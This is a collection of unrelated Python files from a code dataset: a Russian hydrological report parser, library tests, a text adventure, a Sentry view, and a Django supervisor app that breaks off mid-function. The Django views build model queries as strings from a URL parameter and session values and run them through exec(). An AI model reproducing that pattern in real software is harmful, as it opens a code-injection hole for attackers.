(ледяной покров состоит из отдельных слоев,между которыми находится вода или воздушная прослойка)',\n    'Лед на дне (осевший или вследствие предшествующего промерзания реки)',\n    'Река (озеро) промерзла',\n    'Лед искусственно разрушен (ледоколом, взрыванием и др.техническими средствами)',\n    'Наледная вода',\n    'Чисто',\n    '*Лесосплав',\n    'Залом леса выше поста',\n    'Залом леса ниже поста',\n    '*Растительность у берега',\n    '*Растительность по всему сечению потока',\n    '*Растительность по сечению потока пятнами',\n    'Растительность стелется по дну',\n    'Растительность на гидростворе выкошена',\n    'Растительность легла на дно (осенью)',\n    'Растительность занесена илом (во время спуска рыбных прудов и т.д.).',\n    'Растительность погибла в результате загрязнения реки',\n    'Обвал (оползень) берега в створе поста',\n    'Обвал (оползень) берега выше поста',\n    'Обвал (оползень) берега ниже поста',\n    'Дноуглубительные работы в русле',\n    'Намывные работы в русле',\n    'Проведена расчистка русла',\n    'Русло реки сужено на гидростворе для измерения расхода воды',\n    'Образовалась коса',\n    'Коса',\n    'Образовался осередок',\n    'Осередок',\n    'Образовался остров',\n    'Остров',\n    'Смещение русла в плане',\n    'Снежный завал в створе поста',\n    'Снежный завал выше поста',\n    'Снежный завал ниже поста',\n    'Прорыв снежного завала',\n    'Прохождение селя',\n    'Течение реки изменилось на противоположное',\n    'Сгон воды - для устьевых участков рек, озер, водохранилищ',\n    'Нагон воды - для устьевых участков рек, озер, водохранилищ',\n    'Река пересохла',\n    'Волнение слабое, 1 балл - для больших рек, озер, водохранилищ',\n    'Волнение умеренное, 2-3 балла - для больших рек, озер, водохранилищ',\n    'Волнение сильное, более 4 баллов - для больших рек, озер, водохранилищ',\n    'Стоячая вода (перемерз или пересох расположенный выше или ниже перекат)',\n    'Стоячая вода подо льдом',\n    'Прекратилась лодочная переправа',\n    'Прекратилось пешее сообщение',\n    'Началось пешее сообщение',\n    'Началось движение транспорта по льду',\n    'Прекратилось движение транспорта по льду',\n    'Началась лодочная переправа',\n    'Подпор от озера, реки',\n    'Начало навигации',\n    'Конец навигации',\n    'Забор воды выше поста',\n    'Забор воды ниже поста',\n    'Забор воды выше поста прекратился',\n    'Забор воды ниже поста прекратился',\n    'Сброс воды выше поста',\n    'Сброс воды ниже поста',\n    'Сброс воды выше поста прекратился',\n    'Сброс воды ниже поста прекратился',\n    'Плотина (перемычка, запруда, дамба) выше поста',\n    'Плотина (перемычка, запруда, дамба) ниже поста',\n    'Разрушена плотина (перемычка, запруда, дамба) выше поста',\n    'Разрушена плотина (перемычка, запруда, дамба) ниже поста',\n    'Подпор от засорения русла',\n    'Подпор от мостовых переправ',\n    'Пропуски воды из озера, водохранилищ'\n]\n\nclass KN15Error(Exception):\n    \"\"\"Class for exceptions raised when parsing report string\"\"\"\n    pass\n\nclass KN15():\n    @staticmethod\n    def parse():\n        pass\n\n    def __init__(self, report):\n        super().__init__()\n        self._report = report\n        self._basin = None\n        self._station_id = None\n        self._YY = None\n        self._GG = None\n        self._n = None\n        self._stage = None\n        self._change_stage = None\n        self._change_stage_sign = None\n        self._prev_stage = None\n        self._water_temp = None\n        self._air_temp = None\n        self._ice = None\n        self._water_condition = None\n        self._ice_thickness = None\n        self._snow_depth = None\n        self._discharge_integer_part = None\n        self._discharge = None\n        self._precip_amount = None\n        self._precip_duration = None\n        self._parse()\n\n    def _parse(self):\n        identifier = self._report[:5]\n        self._basin = 
identifier[:2]\n self._station_id = identifier[2:]\n parts = re.split(fr'\\s(?={additional_sections_tags})', self._report[6:])\n if not re.match(additional_sections_tags, parts[0]):\n match = re.match(report_pattern, parts[0])\n if match is None:\n raise KN15Error(\"Couldn't parse report string with regular expression\")\n parsed = match.groupdict()\n self._YY = parsed.get('YY')\n self._GG = parsed.get('GG')\n self._n = parsed.get('n')\n self._stage = parsed.get('stage')\n self._change_stage = parsed.get('change_stage')\n self._change_stage_sign = parsed.get('change_stage_sign')\n self._prev_stage = parsed.get('prev_stage')\n self._water_temp = parsed.get('water_temp')\n self._air_temp = parsed.get('air_temp')\n self._ice = parsed.get('ice')\n self._water_condition = parsed.get('water_condition')\n self._ice_thickness = parsed.get('ice_thickness')\n self._snow_depth = parsed.get('snow_depth')\n self._discharge_integer_part = parsed.get('discharge_integer_part')\n self._discharge = parsed.get('discharge')\n self._precip_amount = parsed.get('precip_amount')\n self._precip_duration = parsed.get('precip_duration')\n\n return parsed\n\n\n\n @property\n def identifier(self):\n return f'{self._basin}{self._station_id}'\n\n @property\n def basin(self):\n return self._basin\n\n @property\n def measure_time(self):\n if self._GG and not 0 <= int(self._GG) <= 23: raise KN15Error(f'Time of measure {self._GG} is not between 00 and 23')\n return self._GG\n \n @property\n def ice_conditions(self):\n if not self._ice:\n return None\n conditions = [{\n 'title': ice_conditions[int(self._ice[:2])-11],\n 'intensity': None\n }]\n second2digits = int(self._ice[2:])\n if second2digits < 11:\n conditions[0]['intensity'] = second2digits * 10\n else:\n conditions.append({\n 'title': ice_conditions[second2digits-11],\n 'intensity': None\n })\n return conditions\n\n @property\n def measure_day(self):\n \"\"\"\n measure day of month\n \"\"\"\n if self._YY and not 1 <= int(self._YY) <= 31: raise KN15Error(f'Day of month {self._YY} is not between 1 and 31')\n return self._YY\n\n @property\n def stage(self):\n if self._stage is not None:\n stage = int(self._stage)\n return stage if stage < 5000 else (5000 - stage)\n else:\n return None\n\n @property\n def discharge(self):\n if self._discharge is not None:\n return float(self._discharge) * pow(10, int(self._discharge_integer_part) - 3)\n else:\n return None\n\n @property\n def ice_thickness(self):\n if self._ice_thickness:\n return int(self._ice_thickness)\n else:\n return None\n\n @property\n def snow_depth(self):\n if self._snow_depth is not None:\n return snow_depth_scale[int(self._snow_depth)]\n else:\n return None\n\n @property\n def water_temperature(self):\n if self._water_temp is not None:\n return int(self._water_temp) / 10\n else:\n return None\n\n @property\n def air_temperature(self):\n if self._air_temp is not None and self._air_temp not in ('//', '99'):\n air_temp = int(self._air_temp)\n return air_temp if air_temp < 50 else (50 - air_temp)\n else:\n return None\n\n @property\n def precipitation_duration(self):\n if self._precip_duration is not None:\n return precipitation_duration_scale[int(self._precip_duration)]\n else:\n return None\n\n @property\n def precipitation_amount(self):\n if self._precip_amount is not None:\n precip_amount = float(self._precip_amount)\n return precip_amount if precip_amount < 990 else (precip_amount - 990)/10\n else:\n return None\n\n def decode(self):\n return {\n 'stage': self.stage,\n 'discharge': self.discharge,\n 
'ice_thickness': self.ice_thickness,\n 'snow_depth': self.snow_depth,\n 'precipitation_duration': self.precipitation_duration,\n 'precipitation_amount': self.precipitation_amount,\n 'air_temperature': self.air_temperature,\n 'water_temperature': self.water_temperature,\n 'identifier': self.identifier,\n 'basin': self.basin,\n 'day_of_month': self.measure_day,\n 'synophour': self.measure_time,\n 'ice_conditions': self.ice_conditions\n }\n\n\ndef bulletin_reports(bulletin):\n \"\"\"\n each report in bulletin start with new line and ended with '='\n return iterator for reports in bulletin \n \"\"\"\n return map(lambda m: re.sub(r\"\\s+\", ' ', m.group(1)).strip(), re.finditer(report_bounds, bulletin))\n\n\ndef decode(bulletin):\n if bulletin.split()[0].upper() != 'HHZZ':\n raise TypeError(\"Report does not contain HHZZ in first line\")\n return bulletin_reports(bulletin[4:])\n\n\ndef parse_file(filename):\n with open(filename, 'r') as f:\n bulletin = f.read()\n for report in decode(bulletin):\n try:\n return KN15(report).decode()\n except Exception as ex:\n print(ex)\n\n\ndef parse_report(report):\n try:\n return KN15(report).decode()\n except Exception as ex:\n print(ex)\n\n\n@click.command()\n@click.option('--filename', help='path to file', default=False)\n@click.option('--report', help='Report string to decode', default=False)\ndef parse(filename, report):\n if filename:\n print(parse_file(filename))\n if report:\n print(parse_report(report))\n\n\nif __name__ == \"__main__\":\n parse()\n\n\n","sub_path":"kn15/kn15.py","file_name":"kn15.py","file_ext":"py","file_size_in_byte":16016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"189716422","text":"import longbow\nimport longbow.execute\n\nimport os.path\nimport unittest\n\nimport numpy as np\n\n\nclass TestExecutionGraphSimple(unittest.TestCase):\n def setUp(self):\n super(TestExecutionGraphSimple, self).setUp()\n self.graph = longbow.execute.ExecutionGraph(\n dependencies={\n 4: {2, 3},\n 2: {1},\n 3: {1},\n },\n evaluated={1}\n )\n\n def test_only_input(self):\n self.assertEqual(self.graph.ready, {2, 3})\n\n def test_eval_2(self):\n self.assertEqual(self.graph.with_evaluation(2).ready, {3})\n\n def test_eval_3(self):\n self.assertEqual(self.graph.with_evaluation(3).ready, {2})\n\n def test_eval_2_3(self):\n self.assertEqual(self.graph.with_evaluation(2, 3).ready, {4})\n\n def test_eval_2_3_4(self):\n self.assertEqual(self.graph.with_evaluation(2, 3, 4).ready, set())\n\n\nclass TestDummyExecutor(unittest.TestCase):\n def setUp(self):\n super(TestDummyExecutor, self).setUp()\n self_dir = os.path.dirname(__file__)\n lib_path = os.path.join(self_dir, \"..\", \"build\", \"liblongbow.dylib\")\n lib_path = os.path.abspath(lib_path)\n self.lib = longbow.load_library(lib_path)\n\n def test_subtract_graph(self):\n graph = self.lib.get_graph('longbow::subtract_graph')\n\n executor = longbow.execute.DummyExecutor()\n values = longbow.execute.execute(executor, graph, {\n \"a\": 15.0,\n \"b\": 2.0\n })\n values = longbow.execute.wait(values)\n self.assertEqual(values, {\"c\": 13.0})\n\n def test_evaluate_aggregation(self):\n graph = self.lib.get_graph('longbow::sum_graph')\n node = graph.get_node(2)\n\n executor = longbow.execute.DummyExecutor()\n actual = longbow.execute.evaluate(executor, node, (\n [0.0],\n longbow.execute.Partitions([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]),\n ))\n\n actual = actual.result()\n\n expected = 1 + 2 + 3 + 4 + 5 + 6\n self.assertAlmostEqual(actual, expected)\n\n def 
test_sum_graph(self):\n        graph = self.lib.get_graph(\"longbow::sum_graph\")\n        executor = longbow.execute.DummyExecutor()\n\n        actual = longbow.execute.execute(executor, graph, {\n            \"input\": longbow.execute.Partitions([\n                [1.0, 2.0, 3.0, 4.0, 5.0],\n                [6.0, 7.0, 8.0, 9.0, 0.0]\n            ])\n        })\n        actual = longbow.execute.wait(actual)\n        expected = 1 + 2 + 3 + 4 + 5 + 6 + 7 + 8 + 9 + 0\n\n        self.assertAlmostEqual(actual['output'], expected)\n\n    def test_normalize_graph_bound_variable(self):\n        graph = self.lib.get_graph('longbow::normalize_graph')\n        node = graph.get_node(1)\n\n        self.assertEqual(node.type, \"longbow::cgraph::BoundVariable\")\n        actual = node.transform(())\n\n        np.testing.assert_allclose(actual, [[0], [0], [0]])\n\n    def test_normalize_graph_transformed_partitions_final(self):\n        graph = self.lib.get_graph('longbow::normalize_graph')\n        node = graph.get_node(7)\n        self.assertEqual(node.type, \"longbow::cgraph::TransformedPartitions\")\n\n        actual = node.transform((\n            [2.0, 3.0, 4.0],\n            (np.int32(2), 0.0, 1.0)\n        ))\n\n        s0, s1, s2 = 2, 0, 1\n        mean = s1 / s0\n        std = (s2 / s0 - mean ** 2.0) ** 0.5\n\n        expected = [2.0 / std, 3.0 / std, 4.0 / std]\n\n        np.testing.assert_allclose(actual, expected)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"python/test/test_execute.py","file_name":"test_execute.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"467889928","text":"from room import Room\nfrom player import Player\nfrom item import Item, Treasure, LightSource\nimport textwrap\nimport sys\n# Declare all the rooms\n\nroom = {\n    'outside':  Room(\"Outside Cave Entrance\",\n                     \"North of you, the cave mount beckons\", [LightSource(\"lamp\", \"a battered old lamp with some oil in it\")], True),\n\n    'bridge': Room(\"Bridge\", \"\"\"Rough winds blow across a lonely bridge. The smell of dragon fire and brimstone is heavy here.\nOn the other side you see a red dragon sleeping in the sunlight. It guards the entrance to an ancient cathedral\"\"\", [], True),\n\n    'cathedral': Room(\"Cathedral\", \"\"\"Broken pews, torn tapestries, and skeletons of past adventurers are all that remain inside.\nAt the end, sunlight illuminates the lady's chapel. You see a crack in the wall.\"\"\", [Treasure(\"ruby\", \"crimson red jewel worn by ancient priests\", 10000)], False),\n\n    'foyer':    Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\", [LightSource(\"torch\", \"an everlasting torch that gives off a yellow light\"), Item(\"potion\", \"a bright red potion\"), \nItem(\"parchment\", \"dusty, yellow parchment that's ready to disintegrate\"), Treasure(\"sapphire\", \"sapphire set inside a silver ring\", 20000)], False),\n\n    'armory': Room(\"Armory\", \"\"\"You find a small armory filled with rusted weapons and some tools. At the far end lies a locked chest\nand a blackened shield. You find an inscription on the chest lid: 'The ancient hero offers his sword but only to those he deems worthy'\"\"\", [\nItem(\"shield\", \"a battered steel shield that's been blackened with fire\")], False),\n\n    'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. 
Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\", [Item(\"sword\", \"a broadsword fit for a hero\"), Treasure(\"emerald\", \"hero's emerald necklace\", 30000)], True),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\", [], False),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\", [Item(\"key\", \"a simple brass key\")], False),\n}\n\n\n# Link rooms together\n\nroom['outside'].n_to = room['foyer']\nroom['outside'].e_to = room['bridge']\nroom['bridge'].w_to = room['outside']\nroom['bridge'].n_to = room['cathedral']\nroom['cathedral'].s_to = room['bridge']\nroom['cathedral'].n_to = room['narrow']\nroom['armory'].e_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['foyer'].w_to = room['armory']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['narrow'].s_to = room['cathedral']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n# Make a new player object that is currently in the 'outside' room.\nplayer = Player(\"Justin\", room['outside'])\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n\ngeneral_inputs = [\"q\", \"i\", \"score\"] # valid general inputs\nmove_inputs = [\"n\", \"e\", \"s\", \"w\"] # valid inputs to advance game\nitem_inputs = [\"get\", \"take\", \"drop\"] # valid item interactions\n\nquit = False # describes overall game state\n\nwhile not quit:\n\tcurrent = player.room\n\tdescription = textwrap.fill(current.description)\n\n\t# current room has light\n\tif current.is_light:\n\t\t# show player the room they are in\n\t\tprint(\"{0}\\n{1}\".format(current.name, description))\n\t\t# show player all items available in current room\n\t\tif len(current.items) > 0:\n\t\t\tfor item in current.items:\n\t\t\t\tprint(\"You see:\\n\\ta {0}\\n\\t{1}\".format(item.showName(), item.showDescription()))\n\t\telse:\n\t\t\tprint(\"There are no items in this room\")\n\telse:\n\t\t# no light in current room\n\t\tprint(\"It's pitch black!\")\n\t\tfor item in current.items:\n\t\t\tif isinstance(item, LightSource):\n\t\t\t\tprint(\"{0} might help you see through the darkness\".format(item.name))\n\n\t# take player commands and remove formatting\n\tplayer_input = input(\"Command: \").strip().lower()\n\t# separate player commands into verb + noun\n\tparsed = player_input.split(\" \")\n\n\t# Single Word Command Input Parsing\n\tif len(parsed) == 1:\n\t\tif parsed[0] in general_inputs:\n\t\t\t# player quits/exits game\n\t\t\tif parsed[0] == \"q\" or parsed[0] == \"quit\":\n\t\t\t\tquit = True\n\t\t\t# show player inventory\n\t\t\tif parsed[0] == \"i\":\n\t\t\t\tprint(player.showAllItems())\n\t\t\t# show player score\n\t\t\tif parsed[0] == \"score\":\n\t\t\t\tprint(\"Your score is {0}\".format(player.score))\n\t\telif parsed[0] in move_inputs:\n\t\t\tdirAttr = parsed[0] + \"_to\"\n\t\t\t# check if move input is valid\n\t\t\tif 
hasattr(current, dirAttr):\n\t\t\t\tplayer.room = getattr(current, dirAttr) # update player's location\n\t\t\telse:\n\t\t\t\t# invalid room change\n\t\t\t\tprint(\"You can't go that way!\")\n\t\telse:\n\t\t\t# unknown single command\n\t\t\tprint(\"That command doesn't make sense!\")\n\n\t# Two Word Command Input Parsing\n\telif len(parsed) == 2:\n\t\tverb = parsed[0] # action player takes with an item\n\t\tnoun = parsed[1] # noun itself\n\n\t\tif verb in item_inputs:\n\t\t\tif verb == \"get\" or verb == \"take\":\n\t\t\t\tfor index, item in enumerate(current.items):\n\t\t\t\t\tif item.name == noun:\n\t\t\t\t\t\titem.on_take(player, item.name)\n\t\t\t\t\t\t# remove item from room\n\t\t\t\t\t\tcurrent.items.remove(current.items[index])\n\t\t\t\t\t\t# add item to player inventory\n\t\t\t\t\t\tplayer.inventory.append(item)\n\t\t\tif verb == \"drop\":\n\t\t\t\tfor index, item in enumerate(player.inventory):\n\t\t\t\t\tif item.name == noun:\n\t\t\t\t\t\titem.on_drop(player, item.name)\n\t\t\t\t\t\t# remove item from player inventory\n\t\t\t\t\t\tplayer.inventory.remove(player.inventory[index])\n\t\t\t\t\t\t# add item to room\n\t\t\t\t\t\tcurrent.items.append(item)\n\t\telse:\n\t\t\tprint(\"You can't do that with an item!\")\n\telse:\n\t\tprint(\"That doesn't mean anything!\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/adv/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"62062542","text":"from __future__ import absolute_import\n\nfrom django import forms\nfrom django.contrib import messages\nfrom django.core.urlresolvers import reverse\n\nfrom sentry.api import client\nfrom sentry.models import Project, Team\nfrom sentry.web.forms.add_project import AddProjectForm\nfrom sentry.web.frontend.base import OrganizationView\nfrom sentry.utils.http import absolute_uri\n\nERR_NO_TEAMS = 'You cannot create a new project because there are no teams to assign it to.'\n\n\nclass AddProjectWithTeamForm(AddProjectForm):\n team = forms.ChoiceField(\n choices=(),\n required=True,\n help_text='The team controls who has access to this project.',\n )\n\n class Meta:\n fields = ('name', 'team')\n model = Project\n\n def __init__(self, user, organization, team_list, *args, **kwargs):\n super(AddProjectWithTeamForm, self).__init__(organization, *args, **kwargs)\n\n self.team_list = team_list\n\n if len(self.team_list) == 1:\n del self.fields['team']\n else:\n self.fields['team'].choices = ((t.slug, t.name) for t in team_list)\n self.fields['team'].widget.choices = self.fields['team'].choices\n\n def clean_team(self):\n value = self.cleaned_data['team']\n for team in self.team_list:\n if value == team.slug:\n return team\n return None\n\n def save(self, actor, ip_address):\n team = self.cleaned_data.get('team', self.team_list[0])\n return super(AddProjectWithTeamForm, self).save(actor, team, ip_address)\n\n\nclass CreateProjectView(OrganizationView):\n # While currently the UI suggests teams are a parent of a project, in reality\n # the project is the core component, and which team it is on is simply an\n # attribute. 
Because you can already change the team of a project via mutating\n    # it, and because Sentry intends to remove teams as a hierarchy item, we\n    # allow you to view a team's projects, as well as create a new project as long\n    # as you are a member of that team and have project scoped permissions.\n    required_scope = 'project:write'\n\n    def get_form(self, request, organization, team_list):\n        data = {\n            'team': request.GET.get('team'),\n        }\n        return AddProjectWithTeamForm(\n            request.user, organization, team_list, request.POST or None, initial=data\n        )\n\n    def handle(self, request, organization):\n        team_list = [\n            t for t in Team.objects.get_for_user(\n                organization=organization,\n                user=request.user,\n            ) if request.access.has_team_scope(t, self.required_scope)\n        ]\n        if not team_list:\n            messages.error(request, ERR_NO_TEAMS)\n            return self.redirect(reverse('sentry-organization-home', args=[organization.slug]))\n\n        form = self.get_form(request, organization, team_list)\n        if form.is_valid():\n            team = form.cleaned_data.get('team', team_list[0])\n\n            response = client.post(\n                '/teams/{}/{}/projects/'.format(\n                    organization.slug,\n                    team.slug,\n                ),\n                data={\n                    'name': form.cleaned_data['name'],\n                },\n                request=request\n            )\n\n            install_uri = absolute_uri(\n                '/{}/{}/getting-started/'.format(\n                    organization.slug,\n                    response.data['slug'],\n                )\n            )\n\n            if 'signup' in request.GET:\n                install_uri += '?signup'\n\n            return self.redirect(install_uri)\n\n        context = {\n            'form': form,\n        }\n\n        return self.respond('sentry/create-project.html', context)\n","sub_path":"src/sentry/web/frontend/create_project.py","file_name":"create_project.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605834580","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.macosx-10.12-x86_64/egg/parsec/text.py\n# Compiled at: 2015-08-28 01:15:53\n# Size of source mod 2**32: 500 bytes\nfrom parsec.error import ParsecError\nfrom parsec import Parsec\n\ndef string(s):\n\n    @Parsec\n    def call(st):\n        for chr in s:\n            c = st.next()\n            if chr != c:\n                raise ParsecError(st, \"Expect '{0}' but got {1}\".format(s, c))\n        else:\n            return s\n\n    return call\n\n\n@Parsec\ndef space(state):\n    c = state.next()\n    if c.isspace():\n        return c\n    raise ParsecError(state, 'Expect a space but got {0}'.format(c))","sub_path":"pycfiles/pyparser-1.0.tar/text.cpython-36.py","file_name":"text.cpython-36.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632552426","text":"from django.shortcuts import render\nfrom login import models as models\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.db import connection\nimport datetime\nfrom django.urls import reverse\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\nfrom cryptography.fernet import Fernet as frt\nfrom operator import itemgetter\nfrom datetime import date, timedelta\n# Create your views here.\ndef choice(request):\n    # uid=request.POST.get('daily')\n    # passw=request.POST.get('monthly')\n    \n    if 'daily' in request.POST:\n        \n        # context={\n        #     'cdvordaily':[entry for entry in models.Cdvordaily.objects.all().values()],\n        #     'datisdaily':[entry1 for entry1 in models.Datisdaily.objects.all().values()],\n        #     'dmedaily':[entry for entry in 
models.Dmedaily.objects.all().values()],\n        #     'dscndaily':[entry for entry in models.Dscndaily.objects.all().values()],\n        #     'ndbdaily':[entry for entry in models.Ndbdaily.objects.all().values()],\n        #     'scctvdaily':[entry for entry in models.Scctvdaily.objects.all().values()],\n        #     'vhfdaily':[entry for entry in models.Vhfdaily.objects.all().values()]\n        # }\n        return render(request,'supervisor/daily.html')\n    if 'monthly' in request.POST:\n        # context={\n        #     'cdvormonthly':[entry for entry in models.Cdvormonthly.objects.all().values()],\n        #     # 'datisdaily':[entry1 for entry1 in models.Datisdaily.objects.all().values()],\n        #     'dmemonthly':[entry for entry in models.Dmemonthly.objects.all().values()],\n        #     'dscnmonthly':[entry for entry in models.Dscnmonthly.objects.all().values()],\n        #     'ndbmonthly':[entry for entry in models.Ndbmonthly.objects.all().values()],\n        #     'scctvmonthly':[entry for entry in models.Scctvmonthly.objects.all().values()],\n        #     'vhfmonthly':[entry for entry in models.Vhfmonthly.objects.all().values()]\n        # }\n        return render(request,'supervisor/monthly.html')\n    if 'yearly' in request.POST:\n        return render(request,'supervisor/yearly.html')\n    \n    \n    if 'weekly' in request.POST:\n        # context={\n        #     'cdvorweekly':[entry for entry in models.Cdvorweekly.objects.all().values()],\n        #     'datisweekly':[entry for entry in models.Datisweekly.objects.all().values()],\n        #     'dmeweekly':[entry for entry in models.Dmeweekly.objects.all().values()],\n        #     'dscnweekly':[entry for entry in models.Dscnweekly.objects.all().values()],\n        #     'ndbweekly':[entry for entry in models.Ndbweekly.objects.all().values()],\n        #     'scctvweekly':[entry for entry in models.Scctvweekly.objects.all().values()],\n        #     # 'vhfmonthly':[entry for entry in models.Vhfmonthly.objects.all().values()]\n        # }\n        # context['cdvorweekly']=checkpara(context['cdvorweekly'])\n        \n        # defect={'defect':defect} \n        # context.update(defect)\n        \n        # print(defect)\n        # print(context['cdvorweekly']) \n        # context is commented out above, so render without it\n        return render(request,'supervisor/weekly.html')\n    \n    x=1\n    if x==1:\n    # if request.session.get('dept')=='C':\n        print(\"here\")\n        today = date.today()\n        week_ago = today - timedelta(days=7)\n        info=models.Datisdlogs.objects.values().filter(date__gte = week_ago).order_by('-date')\n        k=None\n        for q,i in enumerate(info):\n            if (str(i['remarks'])=='status of ups not normal' or str(i['remarks'])=='status of ups not normal(update)'):\n                k=q\n                break\n        count=0 \n        alert=0\n        wdate=today\n        rdate=week_ago\n        if k is not None: \n            for j in info[k:]:\n                if str(j['remarks'])=='status of ups not normal' or str(j['remarks'])=='status of ups not normal(update)':\n                    count=count+1\n                    wdate=j['date']\n                if str(j['value'])=='All parameters NORMAL':\n                    rdate=j['date']\n            if count >= 3 and wdate < rdate:\n                alert=1 \n        context = {'alert': alert}\n\n        print('alert= ',str(alert))\n    \n    return render(request,'supervisor/home.html',context)\n\ndef checkpara(temp):\n    err_list=[]\n\n    count=0\n    for index,i in enumerate(temp):\n        if i['ps_5v']<=4:\n            i['err']=1\n            i['ername']='ps_5v'\n        else:\n            i['err']=0\n    \n    # print(temp)\n    return temp\ndef details(request,id,name):\n    id=decode(request,id)\n    if request.session.get('type')=='s':\n        \n        # print(name)\n        \n        str1='temp=models.'\n        str2='.objects.filter(p_id='\n        str3=').values()'\n        str4='.objects.all('\n        que=str1+name+str2+str(id)+str3\n        exec(que,globals())\n        str1='mrec=models.'\n        que=str1+name+str4+str3+\".order_by('-date')\"\n        exec(que,globals())\n        # UNCOMMENT WHEN DONE WITH ALL LOG TABLES\n        logname=name+'logs'\n        logname=logname.replace('daily','d')\n        
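# the exec() calls above resolve model classes from strings; the replace()\n        # chain here maps a table name like 'Datisdaily' to its log table\n        # 'Datisdlogs'. A minimal safer equivalent, assuming the same one-to-one\n        # naming between table names and attributes of login.models, would be:\n        #   model_cls = getattr(models, name)\n        #   temp = model_cls.objects.filter(p_id=id).values()\n        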
logname=logname.replace('monthly','m')\n logname=logname.replace('weekly','w')\n logname=logname.replace('yearly','y')\n print(logname)\n name=name[0].lower()+name[1:]\n # # logname=name+'logs'\n str1='logs=models.'\n str2='.objects.filter(p_id='\n str3=').values()'\n request.session['pid']=id\n request.session['name']=name\n que=str1+logname+str2+str(id)+str3+\".order_by('-log_id')\"\n exec(que,globals())\n # print(\"logs:\")\n # print(logs)\n i=temp[0]\n i['e_token']=encode(request,str(i['emp_id']))\n i['p_token']=encode(request,str(i['p_id']))\n eng=models.Engineer.objects.filter(emp_id=temp[0]['emp_id']).values()\n # print(i)\n redir='supervisor:'+name\n if name =='datisdaily':\n return render(request,'supervisor/imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec})\n elif name == 'datisweekly':\n \n return render(request,'supervisor/impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'dscndaily':\n \n return render(request,'supervisor/dscn_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'dscnmonthly':\n \n return render(request,'supervisor/dscn_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n elif name == 'cdvordaily':\n \n return render(request,'supervisor/cdvor_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'cdvormonthly':\n \n return render(request,'supervisor/cdvor_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'cdvorweekly':\n \n return render(request,'supervisor/cdvor_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvdaily':\n \n return render(request,'supervisor/scctv_imp_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n elif name == 'scctvmonthly':\n \n return render(request,'supervisor/scctv_impm_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \n \n # return render(request,'supervisor/imp_details.html',{'temp':i,'names':name})\n elif name == 'scctvweekly':\n \n return render(request,'supervisor/scctv_impw_details.html',{'eng':eng[0],'temp':i,'names':name,'redir':redir,'logs':logs,'mrec':mrec}) \ndef mail(request,id):\n # print(reverse(\"supervisor:choice\"))\n # print(sid)\n id=decode(request,id)\n mail= models.Engineer.objects.filter(emp_id=id).values('email')\n \n print(mail[0]['email'])\n \n return render(request,\"supervisor/sendmail.html\",{'eid':mail[0]['email'],'uid':id})\n\ndef sent(request):\n send=request.POST['feedback']\n print(send)\n mail_from=models.Supervisor.objects.filter(supervisor_id=request.session.get('uid')).values('email')\n print(mail_from)\n mail=\"From:\"+mail_from[0]['email']+\"\\n\"+send \n str1='temp=models.'\n str2='.objects.get(p_id='\n str3=')'\n names1=request.session['name'].capitalize()\n pid=request.session['pid']\n que=str1+names1+str2+str(request.session['pid'])+str3\n del request.session['name']\n del request.session['pid']\n exec(que,globals())\n now = datetime.datetime.now()\n date=now.strftime(\"%Y-%m-%d\")\n time=now.strftime(\"%H:%M:%S\")\n temp.approval_date=date\n temp.approval_time=time\n temp.unit_incharge_approval='NO'\n\n temp.status=\"PENDING\"\n\n 
